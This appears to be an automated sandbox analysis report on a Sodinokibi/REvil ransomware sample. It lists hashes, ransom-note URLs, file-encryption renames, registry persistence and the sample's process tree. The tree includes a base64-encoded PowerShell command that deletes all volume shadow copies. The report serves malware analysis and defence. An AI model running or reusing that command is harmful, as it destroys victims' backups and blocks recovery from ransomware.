Analysis
-
max time kernel
166s -
max time network
182s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
24-01-2022 00:45
Static task
static1
Behavioral task
behavioral1
Sample
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
Resource
win10-en-20211208
General
-
Target
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
-
Size
165KB
-
MD5
6edc8e537c6cf38e56fcf2af79980344
-
SHA1
024bf6e1cd3084bb453b1826f350e853b1951727
-
SHA256
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1
-
SHA512
5e3cead37cd53c3003f68dd5c4fe87b30d7edefba3ab48a86e2efb2704060b74008011ff0157df26fd161ad411ddae0296f83cfb5a6affc10e7856285121f518
Malware Config
Extracted
C:\fkr31h99x-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A124055E5D1D8F65
http://decryptor.cc/A124055E5D1D8F65
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 13 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\RenameEnter.tiff ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File renamed C:\Users\Admin\Pictures\DenyEnable.tiff => \??\c:\users\admin\pictures\DenyEnable.tiff.fkr31h99x ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File renamed C:\Users\Admin\Pictures\HideConvertTo.crw => \??\c:\users\admin\pictures\HideConvertTo.crw.fkr31h99x ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File renamed C:\Users\Admin\Pictures\NewFind.crw => \??\c:\users\admin\pictures\NewFind.crw.fkr31h99x ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File renamed C:\Users\Admin\Pictures\SyncCompare.crw => \??\c:\users\admin\pictures\SyncCompare.crw.fkr31h99x ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File renamed C:\Users\Admin\Pictures\UnpublishUndo.crw => \??\c:\users\admin\pictures\UnpublishUndo.crw.fkr31h99x ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File renamed C:\Users\Admin\Pictures\ClearWatch.crw => \??\c:\users\admin\pictures\ClearWatch.crw.fkr31h99x ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\pictures\DenyEnable.tiff ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\pictures\PingUnpublish.tiff ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File renamed C:\Users\Admin\Pictures\PingUnpublish.tiff => \??\c:\users\admin\pictures\PingUnpublish.tiff.fkr31h99x ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File renamed C:\Users\Admin\Pictures\RenameEnter.tiff => \??\c:\users\admin\pictures\RenameEnter.tiff.fkr31h99x ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File renamed C:\Users\Admin\Pictures\SetWatch.raw => \??\c:\users\admin\pictures\SetWatch.raw.fkr31h99x ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File renamed C:\Users\Admin\Pictures\ResizeRestore.tif => \??\c:\users\admin\pictures\ResizeRestore.tif.fkr31h99x ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\i7bumVGoL5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe" ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe -
Drops desktop.ini file(s) 26 IoCs
Processes:
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exedescription ioc process File opened for modification \??\c:\users\admin\music\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\onedrive\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\pictures\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\searches\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\videos\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\public\documents\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\documents\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\public\accountpictures\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\public\desktop\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\public\music\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\public\videos\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\desktop\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\downloads\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\public\libraries\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\public\pictures\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\pictures\camera roll\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\pictures\saved pictures\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\public\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files (x86)\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\contacts\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\favorites\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\links\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\saved games\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\public\downloads\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\users\admin\favorites\links\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exedescription ioc process File opened (read-only) \??\V: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\G: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\M: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\N: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\Q: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\T: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\P: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\S: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\W: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\A: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\B: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\I: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\K: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\O: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\Y: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\Z: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\D: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\F: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\J: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\L: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\R: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\X: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\E: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\H: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened (read-only) \??\U: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\do539p5.bmp" ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe -
Drops file in Program Files directory 38 IoCs
Processes:
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exedescription ioc process File opened for modification \??\c:\program files\DisableStop.ADTS ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\ResizeRequest.raw ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\UnprotectRevoke.js ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\UnregisterRename.aif ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\UseSplit.xml ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\WatchCompare.otf ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File created \??\c:\program files\fkr31h99x-readme.txt ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File created \??\c:\program files (x86)\fkr31h99x-readme.txt ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\EnableStep.eps ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\InitializeExpand.aif ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\RepairSkip.TS ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\WatchSearch.mov ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\WriteRedo.dib ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\AddConnect.cfg ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\AssertNew.mpeg2 ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\EnterJoin.odt ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\LimitDisable.vsw ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\MoveUnprotect.DVR-MS ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\LockStart.mhtml ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\OutAssert.DVR-MS ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\ProtectConvertFrom.jpeg ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\SearchConvertTo.ppt ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files (x86)\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\DismountRequest.inf ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\ExitGroup.eprtx ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\PublishImport.DVR ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\desktop.ini ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\DismountDisconnect.asp ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\ShowWait.mpeg3 ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\TestEnter.eps ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\WatchSuspend.dwg ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\CompareResolve.asf ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\GroupInvoke.ram ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\PingGet.au3 ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\ResizeInstall.xltm ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\SendUpdate.ttc ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\MergeStart.ADT ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe File opened for modification \??\c:\program files\StopUnblock.avi ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exepowershell.exepid process 920 ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe 920 ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe 1160 powershell.exe 1160 powershell.exe 1160 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 920 ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe Token: SeDebugPrivilege 1160 powershell.exe Token: SeBackupPrivilege 1212 vssvc.exe Token: SeRestorePrivilege 1212 vssvc.exe Token: SeAuditPrivilege 1212 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exedescription pid process target process PID 920 wrote to memory of 1160 920 ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe powershell.exe PID 920 wrote to memory of 1160 920 ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe"C:\Users\Admin\AppData\Local\Temp\ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe"1⤵
- Modifies extensions of user files
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2264
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1212
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1160-123-0x000002245FCB0000-0x000002245FCB2000-memory.dmpFilesize
8KB
-
memory/1160-124-0x000002245FCB3000-0x000002245FCB5000-memory.dmpFilesize
8KB
-
memory/1160-125-0x000002245FDA0000-0x000002245FDC2000-memory.dmpFilesize
136KB
-
memory/1160-130-0x000002247A0B0000-0x000002247A126000-memory.dmpFilesize
472KB